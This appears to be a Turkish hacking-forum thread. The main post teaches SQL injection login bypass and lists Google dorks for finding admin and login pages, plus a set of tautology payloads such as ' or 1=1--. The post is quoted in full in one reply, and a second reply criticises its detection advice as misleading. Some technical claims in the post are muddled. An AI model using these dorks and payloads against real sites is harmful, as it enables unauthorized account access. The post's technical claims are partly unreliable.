SQL İnjection Saldırıları (Login Bypass)

HERKESE MERHABA BUGÜN SİZLERE SQL İNJECTİON SALDIRILARINI ANLATACAĞIM

SQL İNJECTİON NEDİR :
SQL İNJECTİON SALDIRILARI ŞÖYLEDİR ŞİMDİ Bİ WEBSİTESİ VAR VE BU WEBSİTESİNDE Bİ SQL DATABASE KURULU SİZ BU WEBSİTESİNDEN SQL İLE İLGİLİ HER YAPTIĞINIZ İŞLEMDE ARKADA Bİ SORGU DÖNER MESELA Bİ KATEGORİYE GİRCEKSİNİZ ARKADA Bİ SORGU OLUŞUR MESELA BAZI ÖRNEK SORGULAR VERİYİM BURAYA.
Select <alanlar> from <tablo_adi> where <şartımız/şartlarımız>
YUKARDAKİNE BENZER BİR SÜRÜ SORGU TİPİ VAR SQL İNJECTİON BU TÜR SORGULARI DEĞİŞTİRMEMİZE EKLEME YAPMAMIZA YADA DÜZENLEME YAPABİLMEMİZE OLANAK SAĞLAR
PEKİ SQL İNJECTİON NEREDEN DOĞAR DERSENİZ BU YAPILAN SORGULARININ WAFLANMAMASI FİLTRELENMEMESİ İLE İLGİLİDİR.
SQLDEKİ SORGULAR SİSTEM TABININA GÖRE DEĞİŞİR ORACLE İSE FARKLI UBUNTU İSE FARKLI


BAZI SORGULAR
​

SQL SELECT ​

SQL SELECT DISTINCT​

SQL WHERE​

SQL AND – OR​

SQL ORDER BY​

INSERT INTO​

BUNLAR ARKAPLANDA DÖNEN SORGULARDA KULLANILAN SQL SORGULARI ÖRNEK VERMEK GEREKİRSE SQL SELECT MİSAL Bİ TABLO VAR BU TABLODAKİ İSİM SOYİSİMLERİ LİSTELEMEK İÇİN KULLANABİLİRSİNİZ.PEKİ BUNU SQL İNJECTİON SALDIRISINA NASIL DÖNÜŞTÜRCEM DİYOSANIZ. BU SORGUYA EKLEME YAPARAK VEYA DÜZENLEME YAPARAK MANTIĞINI BOZUP TABLODAKİ TÜM İSİM VE SOYİSİMLERİ ÇEKEBİLİRSİNİZ.



SQL İNJECTİON NASIL TESPİT EDİLİR.

1.urlinin sonuna tırnak koymak
2.dış ağ bantlarını kullanmak yani tool aracılığı nikto ,burp scanner ,acutenix gibi


1.TÜR LOGİN BYPASS
BU SQL İNJECTİON TÜRÜ ARKADA DÖNEN SORGUYU MANTIĞINI BOZARAK YAPILIR MESELA MANTIK BOZMA DEDİĞİNİZ NEY ?
MESELA Bİ GİRİŞ PANELİNDESİNİZ

ÖRNEK SORGU: SELECT * FROM kullaniciadi WHERE id= ‘11 OR 1=1

ŞİMDİ BUNUN MANTIĞI ŞÖYLE SİZ HER GİRİŞ YAPTIĞINIZDA Bİ SORGU DÖNÜYOR YUKARDAKİ GİBİ SİZ DE BU SORGUYU SQL İNJECTİON AÇIĞI SAYESİNDE DÜZENLEME VE EKLEME YAPIYOSUNUZ BU SAYEDE GİRİŞ YAPABİLİYORSUNUZ.
MESELA YUKARDAKİ OLAY İLK BAŞTA EMAİL YAZILMIŞ NORMALDE SORGUNUN BU DOĞRUYSA DEVAM ET ŞEKLİNDE GİTMESİ GEREKİRKEN OR YANİ YADA EKLEMESİYLE 1=1 HER ZAMAN CEVABI DOĞRU ÇIKARTACAĞI İÇİN SİZİN GİRİŞ YAPMANIZA OLANAK SAĞLIYOR
GOOGLE DORKLARI
inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx


BYPASS TÜMLEÇLERİ
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--



DEVAMINI YOLLİCAM BEKLEMEDE KALIN




​

darkexploit' Alıntı:

HERKESE MERHABA BUGÜN SİZLERE SQL İNJECTİON SALDIRILARINI ANLATACAĞIM

SQL İNJECTİON NEDİR :
SQL İNJECTİON SALDIRILARI ŞÖYLEDİR ŞİMDİ Bİ WEBSİTESİ VAR VE BU WEBSİTESİNDE Bİ SQL DATABASE KURULU SİZ BU WEBSİTESİNDEN SQL İLE İLGİLİ HER YAPTIĞINIZ İŞLEMDE ARKADA Bİ SORGU DÖNER MESELA Bİ KATEGORİYE GİRCEKSİNİZ ARKADA Bİ SORGU OLUŞUR MESELA BAZI ÖRNEK SORGULAR VERİYİM BURAYA.
Select <alanlar> from <tablo_adi> where <şartımız/şartlarımız>
YUKARDAKİNE BENZER BİR SÜRÜ SORGU TİPİ VAR SQL İNJECTİON BU TÜR SORGULARI DEĞİŞTİRMEMİZE EKLEME YAPMAMIZA YADA DÜZENLEME YAPABİLMEMİZE OLANAK SAĞLAR
PEKİ SQL İNJECTİON NEREDEN DOĞAR DERSENİZ BU YAPILAN SORGULARININ WAFLANMAMASI FİLTRELENMEMESİ İLE İLGİLİDİR.
SQLDEKİ SORGULAR SİSTEM TABININA GÖRE DEĞİŞİR ORACLE İSE FARKLI UBUNTU İSE FARKLI


BAZI SORGULAR
​

SQL SELECT ​

SQL SELECT DISTINCT​

SQL WHERE​

SQL AND – OR​

SQL ORDER BY​

INSERT INTO​

BUNLAR ARKAPLANDA DÖNEN SORGULARDA KULLANILAN SQL SORGULARI ÖRNEK VERMEK GEREKİRSE SQL SELECT MİSAL Bİ TABLO VAR BU TABLODAKİ İSİM SOYİSİMLERİ LİSTELEMEK İÇİN KULLANABİLİRSİNİZ.PEKİ BUNU SQL İNJECTİON SALDIRISINA NASIL DÖNÜŞTÜRCEM DİYOSANIZ. BU SORGUYA EKLEME YAPARAK VEYA DÜZENLEME YAPARAK MANTIĞINI BOZUP TABLODAKİ TÜM İSİM VE SOYİSİMLERİ ÇEKEBİLİRSİNİZ.



SQL İNJECTİON NASIL TESPİT EDİLİR.

1.urlinin sonuna tırnak koymak
2.dış ağ bantlarını kullanmak yani tool aracılığı nikto ,burp scanner ,acutenix gibi


1.TÜR LOGİN BYPASS
BU SQL İNJECTİON TÜRÜ ARKADA DÖNEN SORGUYU MANTIĞINI BOZARAK YAPILIR MESELA MANTIK BOZMA DEDİĞİNİZ NEY ?
MESELA Bİ GİRİŞ PANELİNDESİNİZ

ÖRNEK SORGU: SELECT * FROM kullaniciadi WHERE id= ‘11 OR 1=1

ŞİMDİ BUNUN MANTIĞI ŞÖYLE SİZ HER GİRİŞ YAPTIĞINIZDA Bİ SORGU DÖNÜYOR YUKARDAKİ GİBİ SİZ DE BU SORGUYU SQL İNJECTİON AÇIĞI SAYESİNDE DÜZENLEME VE EKLEME YAPIYOSUNUZ BU SAYEDE GİRİŞ YAPABİLİYORSUNUZ.
MESELA YUKARDAKİ OLAY İLK BAŞTA EMAİL YAZILMIŞ NORMALDE SORGUNUN BU DOĞRUYSA DEVAM ET ŞEKLİNDE GİTMESİ GEREKİRKEN OR YANİ YADA EKLEMESİYLE 1=1 HER ZAMAN CEVABI DOĞRU ÇIKARTACAĞI İÇİN SİZİN GİRİŞ YAPMANIZA OLANAK SAĞLIYOR
GOOGLE DORKLARI
inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx


BYPASS TÜMLEÇLERİ
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--



DEVAMINI YOLLİCAM BEKLEMEDE KALIN




​

Genişletmek için tıkla ...

xzh' Alıntı:

"url'nin sonuna tırnak koymak" ile zafiyetin olduğunu anlamak doğru bir yöntem değil. O kadar yanlış bilgiler vargi bu konularda yeni başlayan için yanlış yönlendirme yapılıyor.

Genişletmek için tıkla ...